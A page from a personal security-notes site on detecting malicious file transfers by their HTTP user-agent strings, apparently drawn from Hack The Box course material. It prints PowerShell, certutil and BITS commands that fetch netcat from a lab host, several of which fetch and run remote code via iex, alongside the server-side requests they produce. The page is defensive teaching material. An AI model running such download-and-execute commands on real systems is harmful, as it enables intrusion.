🕶️
VICEINTELPRO
GitHub: HorrorClause
  • In Tenebris Videmus
  • 🚩CTFs
    • 💾Hack the Box
      • 🏫Academy
        • Command Injection Assessment
        • XSS Assessment
        • Web Attacks Assessment
    • Try Hack Me
      • In Progress
  • 📖Documents
  • 👨‍🏫HOW-TOs
    • Obisidian How-To
    • Setup Mandiant FLARE VM
  • 📑Security Fundamentals
    • Security Controls
      • Physical Security
      • Endpoint Security
      • Email Security
      • Network Security
      • AAA Controls
    • Networking 101
      • OSI Model
      • Network Fundamentals
      • Network Devices
      • Network Tools
      • Protocols and Ports
    • 👨‍💼Management Principles
      • Risk
      • Policies and Procedures
      • Compliance and Frameworks
      • Change and Patch Management
  • 🛡️Security Concepts
    • ⚠️Risk Assessment Models
      • DREAD Risk Assessment Model
      • STRIDE Threat Model
      • Common Vulnerability Scoring System (CVSS)
    • Pentesting
      • Common Terms
      • AV Identification-Evasion
      • Introduction to Payloads
      • Automating Payloads & Delivery with Metasploit
      • Shells Jack Us In, Payloads Deliver Us Shells
      • Web Shells
      • Pentesting Overview
      • Penetration Testing Process
    • 🐛Vulnerability Assessment
      • Common Vulnerabilities and Exposures (CVE)
      • Common Vulnerability Scoring System (CVSS)
      • Assessment Standards
      • Vulnerability Assessment
      • Vulnerability Scanning
      • Reporting
      • 🎯Nessus
        • Getting Started with Nessus
        • Nessus Scan
        • Working with Nessus Scan Output
        • Advanced Settings
        • Scanning Issues
      • 🦴OpenVAS (Greenbone)
        • Getting Started with OpenVAS
        • OpenVAS
        • Exporting Results
    • Passwords
      • Password Managers
      • Password Policies
      • Password Security Fundamentals
    • Frameworks
    • GRC
    • Logon Types
    • What is Dev-Null ?
  • ⚔️Offensive Security
    • OSINT
      • OSINT - Websites
      • Google Dorks
    • 🔫Attacking Common Services
      • The Concept of Attacks
      • Interacting with Common Services
      • Finding Sensitive Information
      • Attacking DNS
      • Attacking Email Services
      • Attacking FTP
      • Attacking RDP
      • Attacking SMB
      • Attacking SQL Databases
      • Cheat Sheet - Attacking Common Services
      • Service Misconfigurations
    • 🔪Attacking Web Apps with Ffuf
      • Web Fuzzing
      • Directory Fuzzing
      • Page Fuzzing
      • Recursive Fuzzing
      • DNS Records
      • Sub-domain Fuzzing
      • Vhost Fuzzing
      • Filtering Results
      • Parameter Fuzzing - GET
      • Parameter Fuzzing - POST
      • Value Fuzzing
    • ☁️Cloud
      • AWS
        • AWS S3 Buckets
    • 💉Command Injection
      • Command Injection Cheat Sheet
      • Intro to Command Injections
      • Detection
      • Injecting Commands
      • Other Injection Operators
      • Identifying Filters
      • Bypassing Space Filters
      • Bypassing Other Blacklisted Characters
      • Bypassing Blacklisted Commands
      • Advanced Command Obfuscation
      • Evasion Tools
      • Command Injection Prevention
    • Containers
      • Docker
    • ❌Cross-Site Scripting (XSS)
      • Introduction to XSS
      • Stored XSS
      • Reflected XSS
      • DOM XSS
      • XSS Discovery
      • Defacing
      • Phishing
      • Session Hijacking
      • XSS Prevention
    • Directory Busting
      • DirB
      • DirBuster
      • Ffuf
      • Gobuster
    • 🅰️DNS
      • DNSRecon
      • Fierce
    • File Inclusion
      • Local File Inclusion Cheatsheet
      • Intro to File Inclusion
      • Local File Inclusion (LFI)
      • Basic Bypass
      • PHP Filters
      • PHP Wrappers
      • Remote File Inclusion (RFI)
      • LFI and File Uploads
      • Log Poisoning
      • Automated Scanning
      • File Inclusion Prevention
    • File Transfers
      • Transferring Files
      • File Transfer - Quick Commands
      • Living off the Land
      • Windows File Transfer Methods
      • Linux File Transfer Methods
      • Catching Files over HTTP(S)
      • Transferring Files with Code
      • Miscellaneous File Transfer Methods
      • Protected File Transfers
      • Mounting Encrypted VHD Drives
      • Mounting VHD in Kali
      • File Transfer Detection
    • File Upload Attacks
      • File Upload Cheatsheet
      • Absent Validation
      • Upload Exploitation
      • Client-Side Validation
      • Blacklist Filters
      • Whitelist Filters
      • Type Filters
      • Limited File Uploads
      • Other Upload Attacks
      • Preventing File Upload Vulnerabilities
    • 👣Footprinting
      • Linux Remote Management Protocols
      • Windows Remote Management Protocols
      • Enumeration
        • Enumeration Methodology
        • 🖥️Host Based
          • Quick Commands
          • DNS
          • FTP
          • IMAP-POP3
          • IPMI
          • MSSQL
          • MySQL
          • NFS
          • Oracle TNS
          • SMB
  • Powershell
    • Powershell CheatSheet
  • Python
    • Map
    • Anonymous Functions
    • Recursion
      • ZipMap
      • Nested Sum
      • Recursion on a Tree
      • Count Nested Levels
      • Longest Word
    • Function Transformations
      • More Transformations
      • Why Transform?
    • Closures
    • Currying
    • Decorators
    • Sum Types
    • Enums
    • Match
    • Regex
  • Kusto (KQL)
    • SQL and KQL Comparison
    • Using the Where and Sort Operators
    • KQL Queries
  • HTML
  • Insecure File Uploads
Powered by GitBook
On this page
  • Invoke-WebRequest - Client
  • Invoke-WebRequest - Server
  • WinHttpRequest - Client
  • WinHttpRequest - Server
  • Msxml2 - Client
  • Msxml2 - Server
  • Certutil - Client
  • Certutil - Server
  • BITS - Client
  • BITS - Server
  1. Offensive Security
  2. File Transfers

File Transfer Detection

PreviousMounting VHD in KaliNextFile Upload Attacks

Last updated 3 months ago

Related Sites:

Command-line detection based on blacklisting is straightforward to bypass, even using simple case obfuscation. However, although the process of whitelisting all command lines in a particular environment is initially time-consuming, it is very robust and allows for quick detection and alerting on any unusual command lines.

Most client-server protocols require the client and server to negotiate how content will be delivered before exchanging information. This is common with the HTTP protocol. There is a need for interoperability amongst different web servers and web browser types to ensure that users have the same experience no matter their browser. HTTP clients are most readily recognized by their user agent string, which the server uses to identify which HTTP client is connecting to it, for example, Firefox, Chrome, etc.

User agents are not only used to identify web browsers, but anything acting as an HTTP client and connecting to a web server via HTTP can have a user agent string (i.e., cURL, a custom Python script, or common tools such as sqlmap, or Nmap).

Organizations can take some steps to identify potential user agent strings by first building a list of known legitimate user agent strings, user agents used by default operating system processes, common user agents used by update services such as Windows Update, and antivirus updates, etc. These can be fed into a SIEM tool used for threat hunting to filter out legitimate traffic and focus on anomalies that may indicate suspicious behavior. Any suspicious-looking user agent strings can then be further investigated to determine whether they were used to perform malicious actions. This is handy for identifying common user agent strings. A list of user agent strings is available .

Malicious file transfers can also be detected by their user agents. The following user agents/headers were observed from common HTTP transfer techniques (tested on Windows 10, version 10.0.14393, with PowerShell 5).

Invoke-WebRequest - Client

PS C:\htb> Invoke-WebRequest http://10.10.10.32/nc.exe -OutFile "C:\Users\Public\nc.exe" 
PS C:\htb> Invoke-RestMethod http://10.10.10.32/nc.exe -OutFile "C:\Users\Public\nc.exe"

Invoke-WebRequest - Server

GET /nc.exe HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.14393.0

WinHttpRequest - Client

PS C:\htb> $h=new-object -com WinHttp.WinHttpRequest.5.1;
PS C:\htb> $h.open('GET','http://10.10.10.32/nc.exe',$false);
PS C:\htb> $h.send();
PS C:\htb> iex $h.ResponseText

WinHttpRequest - Server

GET /nc.exe HTTP/1.1
Connection: Keep-Alive
Accept: */*
User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)

Msxml2 - Client

PS C:\htb> $h=New-Object -ComObject Msxml2.XMLHTTP;
PS C:\htb> $h.open('GET','http://10.10.10.32/nc.exe',$false);
PS C:\htb> $h.send();
PS C:\htb> iex $h.responseText

Msxml2 - Server

GET /nc.exe HTTP/1.1
Accept: */*
Accept-Language: en-us
UA-CPU: AMD64
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E)

Certutil - Client

C:\htb> certutil -urlcache -split -f http://10.10.10.32/nc.exe 
C:\htb> certutil -verifyctl -split -f http://10.10.10.32/nc.exe

Certutil - Server

GET /nc.exe HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Accept: */*
User-Agent: Microsoft-CryptoAPI/10.0

BITS - Client

PS C:\htb> Import-Module bitstransfer;
PS C:\htb> Start-BitsTransfer 'http://10.10.10.32/nc.exe' $env:temp\t;
PS C:\htb> $r=gc $env:temp\t;
PS C:\htb> rm $env:temp\t; 
PS C:\htb> iex $r

BITS - Server

HEAD /nc.exe HTTP/1.1
Connection: Keep-Alive
Accept: */*
Accept-Encoding: identity
User-Agent: Microsoft BITS/7.8
⚔️
UserAgent Parser
UserAgent List
website
here